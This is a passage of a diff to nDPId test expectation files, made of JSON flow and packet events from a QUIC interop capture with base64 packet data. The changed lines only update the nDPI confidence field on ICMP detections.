9gUKucMB7p6NqaNEaiwlEG2gf0v2FH9hCslV4oko7fHx3ROpToSYQVimVoCtR9PaGonSHaeqACfo9ua\/Zgtv4cLK6ZiV6DBCf0hDnXZRBh+AaUTWPTe3zcHlD
nUHvaFFceiOwKcHKvhC9KWiF3Ddru0uKWSUsFip88BcKpuEabKb0ahOEuMl5XsFJ1\/uDvSVIy33izzMs6n7C\/k4CysougNKX7DiugyzF6BQFi\/VUl9waPfDhomR8hH1euFy1YjY4M2JXUuQh5HV1TzlO4okmnDSo4ios5+eDuKBV4YUuJtBgKFC+X0w\/PUhCXpFy4X3vOqtG4h5S8jL30h+8K84dZjAHTEkJGOvPZIghuHCBB\/bpEvq6Mbt2MCtL\/lIRUUPwjkSauaRIiWSBq1YTOD6X9dULjF3V\/Ewiw=="} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1603816434845,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434845,"pkt":"PKn0qB\/spJGxgjQ5ht1gCSIhBNg6MSABGfAABQwhVAAB\/\/4zO5YgAQsHCsnVrqTT\/kdpHoB9AQTZbQAAAABgAfkDBNgRMiABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWlyERUgTYFmvNCgoKCgjw7KzpNo8oeAAARL4tqmRQ5KPAPbdPUnedDn077kKWSLkPygVEwdGpIVFWcp2en9F3ERED+OnUg3d8i8AAkr44lz5aAq3LC+Q212cavhgupcuDcqNoIGhnCIfm+QSZcdNZ4zXfagNI0pLJoRsvOsL\/uXGYxbmgqR94yTDxQ0eUCVIZASIUeRZjEvJCthWVFT2rgBlBR7LYtLcvCmtn0DIMTAiPE\/xh01OGF5bAJQ2pznCPuONfdxbRDf26\/K7Vorl6tUQm\/NY5ROm8iHLzI4aMVUF0HjSu3+YUC1uhFUVddfTvpusRwaZ7kJNAa7P\/Vy96rw+N1QmHoKrViF3SiU98y7yZQbZlWxDFuBm3kfHuLnWeUnH4lwkgdmjgDw\/tGYT9JNO+a4WXT0WG+E149U5CDNgHVyClW14kVzq2L5mwgYWZMAo+lEamoeJB5h9+NMm0nQlLQivIZYDxop0vohOxK5n93lmaDplwC7Jat5ImroXJjGBA1i\/wWMXgstJIth+GejqRDCbbbeG7NxvZ9rVNx+l6f970K8CtZlugC3GRbFE9tMsDJl5zdBgPz83kXeLW4WfxGljbZ2I1\/Fsv5Dj9XTubdhAYt4ThM0knFSb5aX6Ff26rVq4Lfqy9HtKxEerRRn\/GPQ4yjlBfNoPdWIbjRC7TEbcUSnLf\/aCaXXZvuxf7r562GmcMeGxyHBQBVeTMDY1abEs7sWm\/+SOMgorJmIj9ISqcpplInrkBzayKhF83lHHurhCA1lrKNlSdpeepOLCf\/jMxhKTDSGOt6PuvUNMjvuJNj7JdWjB1qgt+7yg6GfadVoLlc7oKEmP2EZkbg1reAwAQOQU0SIVyNqN7R8++hQVFb9WO4t2FPgkjCkOeg8PKyC0+NKn6ths3s033xQ7XDByeP8Nn2kj5mf2ZY2gISmQLZEcrz0CUqG\/ia+5tqLKj4+\/Cndt6cFxpPnK+zzcl+5uVQbgnRXQJmrxZO\/AIu15jMIC2BXo7iG1s9T31lFVuK8ZWVw0cL8LlBKwlz8kc+VhdGPCJrGwt3wYzDhn2EetnDAIMnbnceC6ASm4ceWPn7zfseGSdZHnqg2ItW2chn2XlcQp4yI6MIqqKBep7wjkYIzq
1Xg27JeDrqOB5eSz5nPdiU3VaODgQWCUUbg9ghrJZfwLkGvswGRALf+EzPBVkuJnFi0tcoasUB17bL2uvxmMJsQHWFO1QguLm7aeVi4DCA7LeprVfnREJzlwtTcq1k5DYJjUcopXIzceZ1RbGyvZp4+Cg3kMpFGVYKly62GUic6\/xL1lutLalr\/JjiJp45zRjU0jch7XG6sx+An4xZJK0US\/g0Kv\/HVtYynUrwZXu\/woHqvI9+NK8siaNZbHMUKRkIGOXCg9aT\/yvWLUSR9BuvtiEH\/8yVs7NtMMrdgpTQTivJT44BZN6SO0WXldGZUkYPP9OVZchj36EQYpACosyteNK+R\/3v7MWWO4pEsgkp64XBxw2OWJLRgsbR2Yz5fH7LkIbs0gEHDj7\/gcfuV5kb5ePRim1rmsSUQI+hvJlOF3Hyyb3A9HUl2d7fhX4v+4KZA=="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1603816434848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1603816434848,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA3DrxAAOER4SQocL88wKgBgBFS0h8AI+oo4AAAAAAACHAbjQjU2gF9\/wAAIP8AAB2a+srq"} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434855,"flow_last_seen":1603816434855,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1603816434855,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1603816434855,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1603816434855,"pkt":"pJGxgjQ5PKn0qB\/sCABFwABTzwsAAEABAQrAqAGAKHC\/PAMDpwYAAAAARQAANz5UQADiEbCMKHC\/PMCoAYARUbXwACMeH\/IAAAAAAAhSHVi6EOpzIP8AACD\/AAAdujqKGg=="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434855,"flow_last_seen":1603816434855,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1603816434855,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.724892} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434855,"flow_last_seen":1603816434855,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1603816434855,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.724892} 
02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1603816434858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434858,"pkt":"pJGxgjQ5PKn0qB\/sht1gAxFJBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUr3wRUgTYu\/LHCgoKCgi+3m+0woW7wAAARL7GquBTGstjJfkM0HNCxgIAREBilxluQhOJlSo3RAJ3sT9YPO\/sQIsdu3\/IepBfUNrpFqupXs61nKnqxJbpzxm4pP4Uet+yqKBfL+M5sZl9PAH7Jj\/GqWj5hATKgnFlarPfqBSj9ebDuM9wxcuFyTqW04DSxk68M1O0uEKdC3hX6Nasxll7WkuCJBNdHdhbRwkrTxC93fxA7Bo+1ttTS+SluGuitxn3q\/f1rhqU3Rtof6iLtaCMP0POUaELPjXeochFM+KP8w+TYjbP1UR+98l3xiMRsa7Boz\/Qn6\/B9lV05gqwE+V+ndrFgiC6SU2W1mGV5dAwfiTvH0i+sGYWDheOhTxFh6v8dwHFK7yfV+qBRnmZIuILrC0ZVc8DVJxRZ00C\/VbecBGOpvKklKxAhnnr4FaiLAx4of\/xkA7t65SFTPGeySaODDta0iajRz3Okg02VlMpJCp4MYtxYVLkYQJvT4qBY\/Q3SYLhujBzrXGbyPfARPZmwKI+Y09++2g8fVjcnUT7cUy2MYcUv3gS8YX693nsVG9GuYuD1Tpc8V\/QW\/ws803NpuGE0fKAOcl7K0x276q2yxhP4KOxhUYk5nzfMGdKYR8tOed7SIHx6I89XxqDLNj\/yeFLjKcS4vphg1MO3ZXRhQu5dGqvsBgmNLF0BLZQE2exAkHM5YlM2d+2Cf5jNJkQmQN96lH4hYOcq+3cMuM0nA85Rh1rVe7urpKa+zhkSNys+oQxwrcKrhB1E8ov6Ir8fjnl9I+CB2E1uCIrXxRxtwOS4nAygc4OHQ9E8aOsj2\/w2X7PRaEwVsM1LrOKeZdUF3LQvTK2DdFbDcrW178BHsEuvh0b\/WIkKQOYUw7iOzrs1SVYgZoQ968zdkRsGSxVafnB0RpYxFcTvGFDKuA6adIdu87Np0MEASWmobXOe+0750NQu\/52K496y+JfUKhL9v1vUZoJcxA4fRjfC7Bh08mLSoPcW2iuYUY5Qfwalz27W5Ykaj0l4a4+FKTTpRfNlIedHfrTqbsQ6rbIQr8tJ+81mqHbG9Zyr8zA2muAME8q9aJsgu+U1HLzCGfWgvZFEV2EknFvEylSdE1r8PywLZ7inFg9hamDgdP5uitPIq1K8RDkjORQoXcwTc3g4iux2RI7AaBEJ4aQ64IImqf2vmsA7Hm9gV4zbJ5GdvI+BL7kLlAKNgqCno4ViE2PY+dAn7DOvAESo8acbeQESQp7Rk3XM18OTLnXB+4WbgD8q7fXA+ECTUMkpHSzm+lB\/4uh\/yExcfDM5gQRfvC\/spXzxuIqVWl2moJyhaC686aJ4KP\/t4qLF+0UIdSblurMexwFEcHDduM5IRHawmbrUFCfEQ+n4o\/SryqiP6om0IN1nAFm1ylhTzYdhrqGwZGRimjSXQBGvHoRTYsAlUs8s7gIQ9BZOAZT5zXBTy9plxFRn0xuOTisgPDNearpDgC37gTQLBm56fc\/xKHrVFHO
5kMHOj6NVCppn2SoJ6\/fLiZL3tw3F0wrYIRE9J7EJb3sJ1aGsgL3pCgWOt7Qvk25++jdWqnsAR14C4ICoJzYNOJ6kjejpAxjuQX8JcLxcnqs2SWXAF1o2jEryGZfGoV3+v\/u2H1\/3a+NF9jJ5g=="} 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1603816434861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"thread_ts_msec":1603816434861,"pkt":"PKn0qB\/spJGxgjQ5ht1gCRGvACsRNCQAiQIAAAAA8DyR\/\/5ppFQgAQsHCsnVrqTT\/kdpHoB9EVHblQArGxDIAAAAAAAI\/VKHHlPIokDaehpK\/wAAHf8AAB7\/AAAf\/wAAIA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1603816434871,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":1603816434871,"pkt":"PKn0qB\/spJGxgjQ5CABFAAAvPS1AACoRkCmM4zRcwKgBgAG7k5gAGycshAAAAAAACPBGL7QnI4n3\/wAAHQ=="} 
@@ -279,7 +279,7 @@ 02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1603816434880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434880,"pkt":"pJGxgjQ5PKn0qB\/sht1gAgKbBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmo4ERUgTY5TrBCgoKCghziEmCXfFrHwAARL5LtYR3ejPf\/p3z4CC05PowI2I8\/yhShfm5nPX+w2RMm09Epp7xl+kBRRhqGjOWMvDuvKtjnCZP4h43yInAnyoQy6CqAqM2X0CJjYqFRLzhwJbIqw2DVbxOowFB4MPGm0ZSauJhv35hdaMdrkpEWiZjZxAcIt9QXdAe3ei5ci4QFJrTlck2vWOijZIoEgmR7v8f3b2ShmI6CdJBBEhbx7x+xdhmvF7QyLqpOKHrLTEfG+pOv4\/x0hdm8B4rKN9lYhLlGSoGddMbooBzzRUA7p16+7rbjImGPkS1MotpttG8+odH6+SDLBY+X3GstYZ1FO\/bzamHEZxYZMgP1ghrma\/s7dEMtCivJ8V9DDtANnntchI6kgniK9bzzOeDCsdM9ITRIlN2z\/Af3okU9roB71yq\/9DX\/TdkJvaU2WO+UeMMmr8r9mAF+UKfPefAvtmM4XpTI7S0sOggW9+ylbRk868BabyiGaalY7v6ElyxYQX5Lm+7f22jDAR\/1Rxw+pqMGJoYSAUT0vcKEq7ImLo5wdD1HbPPsQSmOUj6sUs4CO\/fnKY8anJpGjgDy0aXUYk8jHpkks0Ogglg+nRuCH++j5UW1f7ZAEpNa9vxdlT60Esd66TkVHOw+4sOrTBkOSin7f9JufqnL0\/oha9fVnFNoEifDQokis3kLSU3qOhha5NehjGyqXC4mPnsRXhV1FSJLx2VGefOAKopFDtlBUj77lmzpE4bT3pVw7XDcnU98fJgVGUI0JycRmnYXeBdfKKKe\/C3yD3TJtdWJpUxFWlLU5JBLw1DK7Jaeoa2CHR+Mm+Uos1NDX1p\/Tae7YJ3QTohWBSmBEM8sQU24dwTVN4u9NduhdNUw4abqXZHWWatpGkhOGi+ztCmJQyFuKmz76ia0aYCpdIQEteOm4a+0nCcqQW98i\/PWMOzXN5N4iJBlj7Z1kEIRjKqOh15d3MSiivlm0kY3uvwpzNG6z\/mG64H\/Ch0ZjLDFL0Lh7Mq4u7sR0TzJNJGk7sVaiEPpK8iv5ewweeTFC5Rl0GpKG2cTtrRDh3Jlv0fDheeAqwjrpXOD7ekCHhXvPoBEqPIW59s0aKn33+\/B+x4kneJZP\/w76GqJhpArO5oYmd2nyPv2SM++J5j4el8Gz8DMsGeqEBtxHDWRjkM1rYAvTzN5xb8x5DuFADLFqHlRDraOgEM0xdsEf3hQUK7mhuUCaQGZBsNRdHnNvZL2CgICOnYLx\/yP6eBn+tj4fdyypHuoUxCV0l91OyAz1zzMppQmM\/MZw4IjgKddLGGzkfD9eH5L2StADzoe\/+tl+Vy4q2cConEMFDs6PaRjEIki+cwlbYxOX5IGAOH+nU45b+AhHH3CTnzqcfB1hVJ27u+6GOUu8zMsLgjDTrc3Bi318\/NgqlATYv79utqKeVxozT3TLQMpSZijN7B8+4KqJeZKEmn2cSaCzlZY7LsE5mGM
SEER6hyX0D9p3bjlWs1ZL9V6nrrfHoSzPveONxywVsTghmtxCvne0EGPCkAlJjIUsDS0C0WhRU05kFBDzqpkLuoJAtfN6wRz1A7m00svwCrcx6jydEIcQPaUg5llHIZhpOg+oB895RjVpCjMpMpvctTtfDIJJw1H3cf+g=="} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434886,"flow_last_seen":1603816434886,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434886,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 01192{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1603816434886,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434886,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAYQkAAC0BE6WF8s70wKgBgAMDPAcAAAAARQAFAILLQAApEbMSwKgBgIXyzvS\/\/xFRBOzO1McKCgoKCBW0hlcD4wtQAABE0o5ETsyCKfAiv3GjrhWWAHytWjhKjuCcE8PQ+8\/rlGyAU8f1x+Mk3FCdRieZy\/gIKc\/JJBqsu6Id+Y5I6UUEss09jcswdjUwYmczoGMjYqPo0TgEgq07LxXN2ezzpPgN8+p4f8xWtCxwb8JafjHIFjRWKZy5A\/ktd7oDLtros16gjzk4ANxurCLBEjXn1mc4A1OkxNBYnuq2VBy6bBpOv61yDRD8YC\/\/cKt+DeKlIab2wioxKuuqTJaa6bcvjsxaGxss1fmXynI35PYXkvPyrb+OmmsPeoZV51Hz2RzGwPglrJrYbrEQT\/ivLiFpZ023Tc\/UX5\/6yEdVpklz8RpLexVa6Bn2z1jbV1c+PvjbnEyP4B3XT1q2R1U8Zg+Hg2foBKQpPal7OLyEEZLoYQ0+yrbDuTkJcdCxkssUJpGttMtaDpOYAt3rqklkL5jPHrEd1C+FSNb\/c7TK\/C4zJ9DojLveQhKMASAjgDcBaayNHzmzBxrLpcHuZ77JWq9eQca55sxDzWYh2vyNpayRp3s936eLgTzDYJED3HFsEu7Un7VVKrpKCJGjDAw7oK0mEPfQD9p25UX36n9yQOALJibj1tF+6rPwcqd1enHsqJO2F24HI5WHL0GiGGP5cRaXpNzZ+ijbLCxtX7NKJN8+IHswHT8wg8Yb1lU="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434886,"flow_last_seen":1603816434886,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434886,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.612374} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434886,"flow_last_seen":1603816434886,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434886,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.612374} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1603816434890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1603816434890,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA3dApAADIRazjK7txcwKgBgAG7mBUAI5npkwAAAAAACEmkvxz+BSBNGio6Sv8AACD\/AAAd"} 
02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1603816434894,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434894,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAwXZAAEARa1\/AqAGAilu8k6XkEVEE7KGrwQoKCgoIR0aH1pvahxkAAETSKZaHE9N9GtJMYvv9ifpVeuysckzKOAoBynmJqbZIyXXd6Q0OaiDA1+eXkNpoukJH66d1qZWl2up+oJkJlE2iNPjRL4rTXi4tGFWkOc7OU1ijBfm7sZPOTclysKOTLlG\/wLwmM+4bmiv8t1VJI8ny49KjxXkbGme9dgA0bkSUFasSUnlJAUa50AK97fShfQXzqeK5Dg+WXkJ5xuGOQHrunpIaEPTkH8dZAQC0kgGeFDv4HG0pqkwbzV+IYkH7SmFammklwji5+p3TbOylB01wJbffLThybxWnDqogivkmpQmkVpMhBwMu\/9xKEoVlmIM6B4v9QOFFHqhSd9Fs3q++BMu\/YhweSpnGUx72yfkjBJM\/IRzi1GX4pw11eJz1\/3qBdeWldk+sRUQcox4In2qe+wuxVw2osgoNlI9YvrG4D8P\/zIyWUtdNaLtHhPMgDgiAC91NDmgmJENXcA\/RXPQYvhOdBOfaMfqQoVoSR7Q4FTIccfFsCF+5xHFnMAndfXwOCyIdbeaeIVCpMSQ3bCvvDIsU716Wq\/5J449XPD5T8+ox9fqnlN0Jxyqab0XJ72k9txuNkHNYBZFINRTioCXl6izgIEtcruHCYZt+ILtV2gUUjuR8FtecwJtSSrY5wTZrfp6mz9U9VqFe6kCmkDBYZVE9CTSh5jPIMshdFPvlPyb9jOL5Oce8EEmxF50G+MImURL0E5jw4S6VFP1JWS9s3SOl2ok90TOvvWFQkYQVIGjzaMpXtyBqGjbtpCnFbad8ojifR\/YqGipZKY7YjkWGjouJV\/EDirr0Js9ZOS2bLt0d5OKTRnFRrYMUX7KY8zvzFslodkxSsLJ9F5kbgxZelMuuAZS\/WjzvvYQWm+fu6fqiOFgxzt4cf5I3rtZr1vhb\/mlhSZdfx+5dh2+Bw05\/c+ZhZcGWQVWlIJoLVTK8wVhhxCprdVxcD8azYdyGHI2yjdhdg8y5T1SHS+wMUv3TrTEkgaPMJSS\/bG830bq4zk9YF1gPTLVzdsj3uGV0Cb2GuAxyajIFBjWG43Q+tx8KNtdSeW621EE8H3LtU5Co2FzEFLWry1aFgbJB2zQ2iUthr7o+cxvl+I9ObWsbtyiFbbosM9ubsa940D830mP6uzArtiDHR\/\/tFLOFL88JLiryCWee0dBawNwyN0l3KoWaf0+xrkvJmDrQtP2edAcztmf7vS5YtS7p+DLQu7CH9K63Utaw3a3fUEMW7mKw5KR+OTvLaDXf+fl5pRlYNEqDRWXH4I909g6Vz4OrKab3fRk6tpbyc6YOZkWMRgcj4QWKv9Jjdy\/GO0VWic\/I9O\/C9pHvyAImGRQQ3Dlm9KvoTkJ8oWVAyBE0qeiaF6eLmq95FTaIvn+MgWKZGoMFAxQpObBG41iLXc68P\/q28rKfRP2cjjT0E2a5yH6RR4ZhTZalehf32S79m5P3+jb7+Xyy8XIUQjKRHLykyRjpXm2fvzGkfd\/uvjbx1WH97nbN6TLHvxcWmIC9p8
hr1ew6jGo88bbJUcg867GJeVKG4nDMxlqcviS+1Hf8Ar25WRbo1aTF5rpBjU67mAtQodxvng7drgHRjfXYl0zhU6OqWR+vayEfq8beOLohWXa2bFgOH+TtDLfzLUWOS7634STReD98JKgMwA=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1603816434897,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434897,"pkt":"PKn0qB\/spJGxgjQ5ht1gCwDeACMRMCABSAB4FwEBvnZO\/\/4EYx0gAQsHCsnVrqTT\/kdpHoB9EVHPlAAjX2HlAAAAAAAIQNHw6Rif2eH\/AAAd\/wAAGxoqOko="} 
@@ -299,7 +299,7 @@ 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1603816435011,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":145,"pkt_l4_len":91,"thread_ts_msec":1603816435011,"pkt":"pJGxgjQ5PKn0qB\/sht1gCTD0AFs6QCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUAQQRVgAAAABgCRGvACsRNCQAiQIAAAAA8DyR\/\/5ppFQgAQsHCsnVrqTT\/kdpHoB9EVHblQArPxCkAAAAAAAI\/VKHHlPIokDaehpK\/wAAHf8AAB7\/AAAf\/wAAIA=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816435020,"flow_last_seen":1603816435020,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1603816435020,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1603816435020,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1603816435020,"pkt":"pJGxgjQ5PKn0qB\/sCABFwABLWwEAAEABm4nAqAGAjOM0XAMDgJEAAAAARQAALz1HQAAqEZAPjOM0XMCoAYABu5OYABvoK8MAAAAAAAjwRi+0JyOJ9\/8AAB0="} 
-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816435020,"flow_last_seen":1603816435020,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1603816435020,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.659827} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816435020,"flow_last_seen":1603816435020,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1603816435020,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.659827} 
